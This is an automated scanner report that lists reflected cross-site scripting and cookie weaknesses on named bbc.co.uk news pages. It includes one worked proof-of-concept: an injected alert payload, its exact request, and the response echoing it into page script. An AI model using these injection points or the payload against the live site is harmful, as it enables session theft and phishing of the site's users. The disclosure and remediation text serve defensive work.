XSS, Cross Site Scripting, www.bbc.co.uk, CWE-79, DORK

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by CloudScan Vulnerability Crawler at Mon Feb 14 11:06:28 CST 2011.


The DORK Report

1. Cross-site scripting (reflected)

1.1. http://www.bbc.co.uk/go/rss/int/news/-/news/ [name of an arbitrarily supplied request parameter]

1.2. http://www.bbc.co.uk/go/rss/int/news/-/news/12437486 [name of an arbitrarily supplied request parameter]

1.3. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12427680 [name of an arbitrarily supplied request parameter]

1.4. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12428689 [name of an arbitrarily supplied request parameter]

1.5. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12431066 [name of an arbitrarily supplied request parameter]

1.6. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12431281 [name of an arbitrarily supplied request parameter]

1.7. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12434447 [name of an arbitrarily supplied request parameter]

1.8. http://www.bbc.co.uk/news/business-12434447 [name of an arbitrarily supplied request parameter]

1.9. http://www.bbc.co.uk/news/business-12434453 [name of an arbitrarily supplied request parameter]

1.10. http://www.bbc.co.uk/news/business-12435838 [name of an arbitrarily supplied request parameter]

1.11. http://www.bbc.co.uk/news/business-12437194 [name of an arbitrarily supplied request parameter]

1.12. http://www.bbc.co.uk/news/education-12429152 [name of an arbitrarily supplied request parameter]

1.13. http://www.bbc.co.uk/news/entertainment-arts-12426999 [name of an arbitrarily supplied request parameter]

1.14. http://www.bbc.co.uk/news/entertainment-arts-12427905 [name of an arbitrarily supplied request parameter]

1.15. http://www.bbc.co.uk/news/entertainment-arts-12428196 [name of an arbitrarily supplied request parameter]

1.16. http://www.bbc.co.uk/news/health-12401970 [name of an arbitrarily supplied request parameter]

1.17. http://www.bbc.co.uk/news/health-12409700 [name of an arbitrarily supplied request parameter]

1.18. http://www.bbc.co.uk/news/health-12415801 [name of an arbitrarily supplied request parameter]

1.19. http://www.bbc.co.uk/news/magazine-12392811 [name of an arbitrarily supplied request parameter]

1.20. http://www.bbc.co.uk/news/magazine-12418046 [name of an arbitrarily supplied request parameter]

1.21. http://www.bbc.co.uk/news/magazine-12428754 [name of an arbitrarily supplied request parameter]

1.22. http://www.bbc.co.uk/news/magazine-12428759 [name of an arbitrarily supplied request parameter]

1.23. http://www.bbc.co.uk/news/science-environment-12412662 [name of an arbitrarily supplied request parameter]

1.24. http://www.bbc.co.uk/news/science-environment-12417858 [name of an arbitrarily supplied request parameter]

1.25. http://www.bbc.co.uk/news/science-environment-12424620 [name of an arbitrarily supplied request parameter]

1.26. http://www.bbc.co.uk/news/technology-12419672 [name of an arbitrarily supplied request parameter]

1.27. http://www.bbc.co.uk/news/technology-12429808 [name of an arbitrarily supplied request parameter]

1.28. http://www.bbc.co.uk/news/uk-12427839 [name of an arbitrarily supplied request parameter]

1.29. http://www.bbc.co.uk/news/uk-12437244 [name of an arbitrarily supplied request parameter]

1.30. http://www.bbc.co.uk/news/uk-england-london-12438040 [name of an arbitrarily supplied request parameter]

1.31. http://www.bbc.co.uk/news/uk-northern-ireland-12427112 [name of an arbitrarily supplied request parameter]

1.32. http://www.bbc.co.uk/news/uk-northern-ireland-12428837 [name of an arbitrarily supplied request parameter]

1.33. http://www.bbc.co.uk/news/uk-politics-12428814 [name of an arbitrarily supplied request parameter]

1.34. http://www.bbc.co.uk/news/uk-scotland-12433015 [name of an arbitrarily supplied request parameter]

1.35. http://www.bbc.co.uk/news/uk-scotland-tayside-central-12433192 [name of an arbitrarily supplied request parameter]

1.36. http://www.bbc.co.uk/news/uk-wales-12427865 [name of an arbitrarily supplied request parameter]

1.37. http://www.bbc.co.uk/news/uk-wales-12433322 [name of an arbitrarily supplied request parameter]

1.38. http://www.bbc.co.uk/news/world-12428938 [name of an arbitrarily supplied request parameter]

1.39. http://www.bbc.co.uk/news/world-12434787 [name of an arbitrarily supplied request parameter]

1.40. http://www.bbc.co.uk/news/world-africa-12427390 [name of an arbitrarily supplied request parameter]

1.41. http://www.bbc.co.uk/news/world-africa-12430115 [name of an arbitrarily supplied request parameter]

1.42. http://www.bbc.co.uk/news/world-africa-12432292 [name of an arbitrarily supplied request parameter]

1.43. http://www.bbc.co.uk/news/world-africa-12433674 [name of an arbitrarily supplied request parameter]

1.44. http://www.bbc.co.uk/news/world-asia-pacific-12427423 [name of an arbitrarily supplied request parameter]

1.45. http://www.bbc.co.uk/news/world-asia-pacific-12428385 [name of an arbitrarily supplied request parameter]

1.46. http://www.bbc.co.uk/news/world-asia-pacific-12430671 [name of an arbitrarily supplied request parameter]

1.47. http://www.bbc.co.uk/news/world-middle-east-12435798 [name of an arbitrarily supplied request parameter]

1.48. http://www.bbc.co.uk/news/world-middle-east-12437440 [name of an arbitrarily supplied request parameter]

1.49. http://www.bbc.co.uk/news/world-middle-east-12437881 [name of an arbitrarily supplied request parameter]

1.50. http://www.bbc.co.uk/news/world-middle-east-12437912 [name of an arbitrarily supplied request parameter]

1.51. http://www.bbc.co.uk/news/world-middle-east-12437922 [name of an arbitrarily supplied request parameter]

1.52. http://www.bbc.co.uk/news/world-south-asia-12427513 [name of an arbitrarily supplied request parameter]

1.53. http://www.bbc.co.uk/news/world-south-asia-12427518 [name of an arbitrarily supplied request parameter]

1.54. http://www.bbc.co.uk/news/world-south-asia-12437087 [name of an arbitrarily supplied request parameter]

1.55. http://www.bbc.co.uk/news/world-us-canada-12411274 [name of an arbitrarily supplied request parameter]

1.56. http://www.bbc.co.uk/news/world-us-canada-12435117 [name of an arbitrarily supplied request parameter]

1.57. http://www.bbc.co.uk/news/world-us-canada-12436383 [name of an arbitrarily supplied request parameter]

1.58. http://www.bbc.co.uk/news/world-us-canada-12437116 [name of an arbitrarily supplied request parameter]

1.59. http://www.bbc.co.uk/news/world-us-canada-12437121 [name of an arbitrarily supplied request parameter]

1.60. http://www.bbc.co.uk/news/business-12434447 [Referer HTTP header]

1.61. http://www.bbc.co.uk/news/business-12434453 [Referer HTTP header]

1.62. http://www.bbc.co.uk/news/business-12435838 [Referer HTTP header]

1.63. http://www.bbc.co.uk/news/business-12437194 [Referer HTTP header]

1.64. http://www.bbc.co.uk/news/education-12429152 [Referer HTTP header]

1.65. http://www.bbc.co.uk/news/entertainment-arts-12426999 [Referer HTTP header]

1.66. http://www.bbc.co.uk/news/entertainment-arts-12427905 [Referer HTTP header]

1.67. http://www.bbc.co.uk/news/entertainment-arts-12428196 [Referer HTTP header]

1.68. http://www.bbc.co.uk/news/health-12401970 [Referer HTTP header]

1.69. http://www.bbc.co.uk/news/health-12409700 [Referer HTTP header]

1.70. http://www.bbc.co.uk/news/health-12415801 [Referer HTTP header]

1.71. http://www.bbc.co.uk/news/magazine-12392811 [Referer HTTP header]

1.72. http://www.bbc.co.uk/news/magazine-12418046 [Referer HTTP header]

1.73. http://www.bbc.co.uk/news/magazine-12428754 [Referer HTTP header]

1.74. http://www.bbc.co.uk/news/magazine-12428759 [Referer HTTP header]

1.75. http://www.bbc.co.uk/news/science-environment-12412662 [Referer HTTP header]

1.76. http://www.bbc.co.uk/news/science-environment-12417858 [Referer HTTP header]

1.77. http://www.bbc.co.uk/news/science-environment-12424620 [Referer HTTP header]

1.78. http://www.bbc.co.uk/news/technology-12419672 [Referer HTTP header]

1.79. http://www.bbc.co.uk/news/technology-12429808 [Referer HTTP header]

1.80. http://www.bbc.co.uk/news/uk-12427839 [Referer HTTP header]

1.81. http://www.bbc.co.uk/news/uk-12437244 [Referer HTTP header]

1.82. http://www.bbc.co.uk/news/uk-england-london-12438040 [Referer HTTP header]

1.83. http://www.bbc.co.uk/news/uk-northern-ireland-12427112 [Referer HTTP header]

1.84. http://www.bbc.co.uk/news/uk-northern-ireland-12428837 [Referer HTTP header]

1.85. http://www.bbc.co.uk/news/uk-politics-12428814 [Referer HTTP header]

1.86. http://www.bbc.co.uk/news/uk-scotland-12433015 [Referer HTTP header]

1.87. http://www.bbc.co.uk/news/uk-scotland-tayside-central-12433192 [Referer HTTP header]

1.88. http://www.bbc.co.uk/news/uk-wales-12427865 [Referer HTTP header]

1.89. http://www.bbc.co.uk/news/uk-wales-12433322 [Referer HTTP header]

1.90. http://www.bbc.co.uk/news/world-12428938 [Referer HTTP header]

1.91. http://www.bbc.co.uk/news/world-middle-east-12435798 [Referer HTTP header]

1.92. http://www.bbc.co.uk/news/world-middle-east-12437440 [Referer HTTP header]

1.93. http://www.bbc.co.uk/news/world-middle-east-12437881 [Referer HTTP header]

1.94. http://www.bbc.co.uk/news/world-middle-east-12437912 [Referer HTTP header]

1.95. http://www.bbc.co.uk/news/world-middle-east-12437922 [Referer HTTP header]

1.96. http://www.bbc.co.uk/news/world-south-asia-12427513 [Referer HTTP header]

1.97. http://www.bbc.co.uk/news/world-south-asia-12427518 [Referer HTTP header]

1.98. http://www.bbc.co.uk/news/world-south-asia-12437087 [Referer HTTP header]

1.99. http://www.bbc.co.uk/news/world-us-canada-12411274 [Referer HTTP header]

1.100. http://www.bbc.co.uk/news/world-us-canada-12435117 [Referer HTTP header]

1.101. http://www.bbc.co.uk/news/world-us-canada-12436383 [Referer HTTP header]

1.102. http://www.bbc.co.uk/news/world-us-canada-12437116 [Referer HTTP header]

1.103. http://www.bbc.co.uk/news/world-us-canada-12437121 [Referer HTTP header]

2. Cookie scoped to parent domain

2.1. http://www.bbc.co.uk/go/rss/int/news/-/news/

2.2. http://www.bbc.co.uk/go/rss/int/news/-/news/12437486

2.3. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12427680

2.4. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12428689

2.5. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12431066

2.6. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12431281

2.7. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12434447

2.8. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12434453

2.9. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12435838

2.10. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12437194

2.11. http://www.bbc.co.uk/go/rss/int/news/-/news/education-12429152

2.12. http://www.bbc.co.uk/go/rss/int/news/-/news/entertainment-arts-12426999

2.13. http://www.bbc.co.uk/go/rss/int/news/-/news/entertainment-arts-12427905

2.14. http://www.bbc.co.uk/go/rss/int/news/-/news/entertainment-arts-12428196

2.15. http://www.bbc.co.uk/go/rss/int/news/-/news/health-12401970

2.16. http://www.bbc.co.uk/go/rss/int/news/-/news/health-12409700

2.17. http://www.bbc.co.uk/go/rss/int/news/-/news/health-12415801

2.18. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12392811

2.19. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12418046

2.20. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12428754

2.21. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12428759

2.22. http://www.bbc.co.uk/go/rss/int/news/-/news/science-environment-12412662

2.23. http://www.bbc.co.uk/go/rss/int/news/-/news/science-environment-12417858

2.24. http://www.bbc.co.uk/go/rss/int/news/-/news/science-environment-12424620

2.25. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12433758

2.26. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12435274

2.27. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12435550

2.28. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12435798

2.29. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437440

2.30. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437881

2.31. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437912

2.32. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437922

2.33. http://www.bbc.co.uk/go/rss/int/news/-/news/world-south-asia-12427513

2.34. http://www.bbc.co.uk/go/rss/int/news/-/news/world-south-asia-12427518

2.35. http://www.bbc.co.uk/go/rss/int/news/-/news/world-south-asia-12437087

2.36. http://www.bbc.co.uk/go/rss/int/news/-/news/world-us-canada-12411274

2.37. http://www.bbc.co.uk/news/business-12434447

2.38. http://www.bbc.co.uk/news/business-12434453

2.39. http://www.bbc.co.uk/news/business-12435838

2.40. http://www.bbc.co.uk/news/business-12437194

2.41. http://www.bbc.co.uk/news/education-12429152

2.42. http://www.bbc.co.uk/news/entertainment-arts-12426999

2.43. http://www.bbc.co.uk/news/entertainment-arts-12427905

2.44. http://www.bbc.co.uk/news/entertainment-arts-12428196

2.45. http://www.bbc.co.uk/news/health-12401970

2.46. http://www.bbc.co.uk/news/health-12409700

2.47. http://www.bbc.co.uk/news/health-12415801

2.48. http://www.bbc.co.uk/news/magazine-12392811

2.49. http://www.bbc.co.uk/news/magazine-12418046

2.50. http://www.bbc.co.uk/news/magazine-12428754

2.51. http://www.bbc.co.uk/news/magazine-12428759

2.52. http://www.bbc.co.uk/news/science-environment-12412662

2.53. http://www.bbc.co.uk/news/science-environment-12417858

2.54. http://www.bbc.co.uk/news/science-environment-12424620

2.55. http://www.bbc.co.uk/news/technology-12419672

2.56. http://www.bbc.co.uk/news/technology-12429808

2.57. http://www.bbc.co.uk/news/uk-12427839

2.58. http://www.bbc.co.uk/news/uk-12435618

2.59. http://www.bbc.co.uk/news/uk-12437244

2.60. http://www.bbc.co.uk/news/uk-england-london-12438040

2.61. http://www.bbc.co.uk/news/uk-northern-ireland-12427112

2.62. http://www.bbc.co.uk/news/uk-northern-ireland-12428837

2.63. http://www.bbc.co.uk/news/uk-politics-12428814

2.64. http://www.bbc.co.uk/news/uk-scotland-12433015

2.65. http://www.bbc.co.uk/news/uk-scotland-tayside-central-12433192

2.66. http://www.bbc.co.uk/news/uk-wales-12427865

2.67. http://www.bbc.co.uk/news/uk-wales-12433322

2.68. http://www.bbc.co.uk/news/world-12428938

2.69. http://www.bbc.co.uk/news/world-12434787

2.70. http://www.bbc.co.uk/news/world-africa-12427390

2.71. http://www.bbc.co.uk/news/world-africa-12430115

2.72. http://www.bbc.co.uk/news/world-africa-12432292

2.73. http://www.bbc.co.uk/news/world-africa-12433674

2.74. http://www.bbc.co.uk/news/world-asia-pacific-12427423

2.75. http://www.bbc.co.uk/news/world-asia-pacific-12428385

2.76. http://www.bbc.co.uk/news/world-asia-pacific-12430671

2.77. http://www.bbc.co.uk/news/world-europe-12429539

2.78. http://www.bbc.co.uk/news/world-europe-12432879

2.79. http://www.bbc.co.uk/news/world-latin-america-12427051

2.80. http://www.bbc.co.uk/news/world-latin-america-12427057

2.81. http://www.bbc.co.uk/news/world-latin-america-12436213

2.82. http://www.bbc.co.uk/news/world-middle-east-12435798

2.83. http://www.bbc.co.uk/news/world-middle-east-12437440

2.84. http://www.bbc.co.uk/news/world-middle-east-12437881

2.85. http://www.bbc.co.uk/news/world-middle-east-12437912

2.86. http://www.bbc.co.uk/news/world-middle-east-12437922

2.87. http://www.bbc.co.uk/news/world-south-asia-12427513

2.88. http://www.bbc.co.uk/news/world-south-asia-12427518

2.89. http://www.bbc.co.uk/news/world-south-asia-12437087

2.90. http://www.bbc.co.uk/news/world-us-canada-12411274

2.91. http://www.bbc.co.uk/news/world-us-canada-12435117

2.92. http://www.bbc.co.uk/news/world-us-canada-12436383

2.93. http://www.bbc.co.uk/news/world-us-canada-12437116

2.94. http://www.bbc.co.uk/news/world-us-canada-12437121

3. Cross-domain script include

3.1. http://www.bbc.co.uk/news/business-12434447

3.2. http://www.bbc.co.uk/news/business-12434453

3.3. http://www.bbc.co.uk/news/business-12435838

3.4. http://www.bbc.co.uk/news/business-12437194

3.5. http://www.bbc.co.uk/news/education-12429152

3.6. http://www.bbc.co.uk/news/entertainment-arts-12426999

3.7. http://www.bbc.co.uk/news/entertainment-arts-12427905

3.8. http://www.bbc.co.uk/news/entertainment-arts-12428196

3.9. http://www.bbc.co.uk/news/health-12401970

3.10. http://www.bbc.co.uk/news/health-12409700

3.11. http://www.bbc.co.uk/news/health-12415801

3.12. http://www.bbc.co.uk/news/magazine-12392811

3.13. http://www.bbc.co.uk/news/magazine-12418046

3.14. http://www.bbc.co.uk/news/magazine-12428754

3.15. http://www.bbc.co.uk/news/magazine-12428759

3.16. http://www.bbc.co.uk/news/science-environment-12412662

3.17. http://www.bbc.co.uk/news/science-environment-12417858

3.18. http://www.bbc.co.uk/news/science-environment-12424620

3.19. http://www.bbc.co.uk/news/technology-12419672

3.20. http://www.bbc.co.uk/news/technology-12429808

3.21. http://www.bbc.co.uk/news/uk-12427839

3.22. http://www.bbc.co.uk/news/uk-12435618

3.23. http://www.bbc.co.uk/news/uk-12437244

3.24. http://www.bbc.co.uk/news/uk-england-london-12438040

3.25. http://www.bbc.co.uk/news/uk-northern-ireland-12427112

3.26. http://www.bbc.co.uk/news/uk-northern-ireland-12428837

3.27. http://www.bbc.co.uk/news/uk-politics-12428814

3.28. http://www.bbc.co.uk/news/uk-scotland-12433015

3.29. http://www.bbc.co.uk/news/uk-scotland-tayside-central-12433192

3.30. http://www.bbc.co.uk/news/uk-wales-12427865

3.31. http://www.bbc.co.uk/news/uk-wales-12433322

3.32. http://www.bbc.co.uk/news/world-12428938

3.33. http://www.bbc.co.uk/news/world-12434787

3.34. http://www.bbc.co.uk/news/world-africa-12427390

3.35. http://www.bbc.co.uk/news/world-africa-12430115

3.36. http://www.bbc.co.uk/news/world-africa-12432292

3.37. http://www.bbc.co.uk/news/world-africa-12433674

3.38. http://www.bbc.co.uk/news/world-asia-pacific-12427423

3.39. http://www.bbc.co.uk/news/world-asia-pacific-12428385

3.40. http://www.bbc.co.uk/news/world-asia-pacific-12430671

3.41. http://www.bbc.co.uk/news/world-europe-12429539

3.42. http://www.bbc.co.uk/news/world-europe-12432879

3.43. http://www.bbc.co.uk/news/world-latin-america-12427051

3.44. http://www.bbc.co.uk/news/world-latin-america-12427057

3.45. http://www.bbc.co.uk/news/world-latin-america-12436213

3.46. http://www.bbc.co.uk/news/world-middle-east-12435798

3.47. http://www.bbc.co.uk/news/world-middle-east-12437440

3.48. http://www.bbc.co.uk/news/world-middle-east-12437881

3.49. http://www.bbc.co.uk/news/world-middle-east-12437912

3.50. http://www.bbc.co.uk/news/world-middle-east-12437922

3.51. http://www.bbc.co.uk/news/world-south-asia-12427513

3.52. http://www.bbc.co.uk/news/world-south-asia-12427518

3.53. http://www.bbc.co.uk/news/world-south-asia-12437087

3.54. http://www.bbc.co.uk/news/world-us-canada-12411274

3.55. http://www.bbc.co.uk/news/world-us-canada-12435117

3.56. http://www.bbc.co.uk/news/world-us-canada-12436383

3.57. http://www.bbc.co.uk/news/world-us-canada-12437116

3.58. http://www.bbc.co.uk/news/world-us-canada-12437121

4. Cookie without HttpOnly flag set

4.1. http://www.bbc.co.uk/go/rss/int/news/-/news/

4.2. http://www.bbc.co.uk/go/rss/int/news/-/news/12437486

4.3. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12427680

4.4. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12428689

4.5. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12431066

4.6. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12431281

4.7. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12434447

4.8. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12434453

4.9. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12435838

4.10. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12437194

4.11. http://www.bbc.co.uk/go/rss/int/news/-/news/education-12429152

4.12. http://www.bbc.co.uk/go/rss/int/news/-/news/entertainment-arts-12426999

4.13. http://www.bbc.co.uk/go/rss/int/news/-/news/entertainment-arts-12427905

4.14. http://www.bbc.co.uk/go/rss/int/news/-/news/entertainment-arts-12428196

4.15. http://www.bbc.co.uk/go/rss/int/news/-/news/health-12401970

4.16. http://www.bbc.co.uk/go/rss/int/news/-/news/health-12409700

4.17. http://www.bbc.co.uk/go/rss/int/news/-/news/health-12415801

4.18. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12392811

4.19. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12418046

4.20. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12428754

4.21. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12428759

4.22. http://www.bbc.co.uk/go/rss/int/news/-/news/science-environment-12412662

4.23. http://www.bbc.co.uk/go/rss/int/news/-/news/science-environment-12417858

4.24. http://www.bbc.co.uk/go/rss/int/news/-/news/science-environment-12424620

4.25. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12433758

4.26. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12435274

4.27. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12435550

4.28. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12435798

4.29. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437440

4.30. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437881

4.31. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437912

4.32. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437922

4.33. http://www.bbc.co.uk/go/rss/int/news/-/news/world-south-asia-12427513

4.34. http://www.bbc.co.uk/go/rss/int/news/-/news/world-south-asia-12427518

4.35. http://www.bbc.co.uk/go/rss/int/news/-/news/world-south-asia-12437087

4.36. http://www.bbc.co.uk/go/rss/int/news/-/news/world-us-canada-12411274

4.37. http://www.bbc.co.uk/news/business-12434447

4.38. http://www.bbc.co.uk/news/business-12434453

4.39. http://www.bbc.co.uk/news/business-12435838

4.40. http://www.bbc.co.uk/news/business-12437194

4.41. http://www.bbc.co.uk/news/education-12429152

4.42. http://www.bbc.co.uk/news/entertainment-arts-12426999

4.43. http://www.bbc.co.uk/news/entertainment-arts-12427905

4.44. http://www.bbc.co.uk/news/entertainment-arts-12428196

4.45. http://www.bbc.co.uk/news/health-12401970

4.46. http://www.bbc.co.uk/news/health-12409700

4.47. http://www.bbc.co.uk/news/health-12415801

4.48. http://www.bbc.co.uk/news/magazine-12392811

4.49. http://www.bbc.co.uk/news/magazine-12418046

4.50. http://www.bbc.co.uk/news/magazine-12428754

4.51. http://www.bbc.co.uk/news/magazine-12428759

4.52. http://www.bbc.co.uk/news/science-environment-12412662

4.53. http://www.bbc.co.uk/news/science-environment-12417858

4.54. http://www.bbc.co.uk/news/science-environment-12424620

4.55. http://www.bbc.co.uk/news/technology-12419672

4.56. http://www.bbc.co.uk/news/technology-12429808

4.57. http://www.bbc.co.uk/news/uk-12427839

4.58. http://www.bbc.co.uk/news/uk-12435618

4.59. http://www.bbc.co.uk/news/uk-12437244

4.60. http://www.bbc.co.uk/news/uk-england-london-12438040

4.61. http://www.bbc.co.uk/news/uk-northern-ireland-12427112

4.62. http://www.bbc.co.uk/news/uk-northern-ireland-12428837

4.63. http://www.bbc.co.uk/news/uk-politics-12428814

4.64. http://www.bbc.co.uk/news/uk-scotland-12433015

4.65. http://www.bbc.co.uk/news/uk-scotland-tayside-central-12433192

4.66. http://www.bbc.co.uk/news/uk-wales-12427865

4.67. http://www.bbc.co.uk/news/uk-wales-12433322

4.68. http://www.bbc.co.uk/news/world-12428938

4.69. http://www.bbc.co.uk/news/world-12434787

4.70. http://www.bbc.co.uk/news/world-africa-12427390

4.71. http://www.bbc.co.uk/news/world-africa-12430115

4.72. http://www.bbc.co.uk/news/world-africa-12432292

4.73. http://www.bbc.co.uk/news/world-africa-12433674

4.74. http://www.bbc.co.uk/news/world-asia-pacific-12427423

4.75. http://www.bbc.co.uk/news/world-asia-pacific-12428385

4.76. http://www.bbc.co.uk/news/world-asia-pacific-12430671

4.77. http://www.bbc.co.uk/news/world-europe-12429539

4.78. http://www.bbc.co.uk/news/world-europe-12432879

4.79. http://www.bbc.co.uk/news/world-latin-america-12427051

4.80. http://www.bbc.co.uk/news/world-latin-america-12427057

4.81. http://www.bbc.co.uk/news/world-latin-america-12436213

4.82. http://www.bbc.co.uk/news/world-middle-east-12435798

4.83. http://www.bbc.co.uk/news/world-middle-east-12437440

4.84. http://www.bbc.co.uk/news/world-middle-east-12437881

4.85. http://www.bbc.co.uk/news/world-middle-east-12437912

4.86. http://www.bbc.co.uk/news/world-middle-east-12437922

4.87. http://www.bbc.co.uk/news/world-south-asia-12427513

4.88. http://www.bbc.co.uk/news/world-south-asia-12427518

4.89. http://www.bbc.co.uk/news/world-south-asia-12437087

4.90. http://www.bbc.co.uk/news/world-us-canada-12411274

4.91. http://www.bbc.co.uk/news/world-us-canada-12435117

4.92. http://www.bbc.co.uk/news/world-us-canada-12436383

4.93. http://www.bbc.co.uk/news/world-us-canada-12437116

4.94. http://www.bbc.co.uk/news/world-us-canada-12437121

5. Email addresses disclosed

5.1. http://www.bbc.co.uk/news/science-environment-12412662

5.2. http://www.bbc.co.uk/news/world-middle-east-12435798



1. Cross-site scripting (reflected)
There are 103 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses. First, input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain (for example, a year of birth should consist of exactly four numerals); input which fails the validation should be rejected, not sanitised. Second, user input should be encoded for the output context at every point where it is copied into application responses: HTML metacharacters (at minimum < > " ' and =) should be replaced with the corresponding HTML entities, and data placed inside a JavaScript string literal must additionally be escaped for that context, since HTML entity encoding alone does not neutralise a quote character inside script. In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.bbc.co.uk/go/rss/int/news/-/news/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac8ab'-alert(1)-'a3dca9f04e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/news/?ac8ab'-alert(1)-'a3dca9f04e7=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:44 GMT
Keep-Alive: timeout=10, max=718
Expires: Sat, 12 Feb 2011 02:02:44 GMT
Connection: close
Set-Cookie: BBC-UID=341da5b5ee6af47478cdc185b1979455565f170f3080722357ddfa9075431a7e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=341da5b5ee6af47478cdc185b1979455565f170f3080722357ddfa9075431a7e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Content-Length: 81881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476164000,
       editionToServe: 'us',
       queryString: 'ac8ab'-alert(1)-'a3dca9f04e7=1',
       referrer: null,
       section: 'front-page',
       sectionPath: '/Front page',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '10263779',
       assetType: 'index',
...[SNIP]...
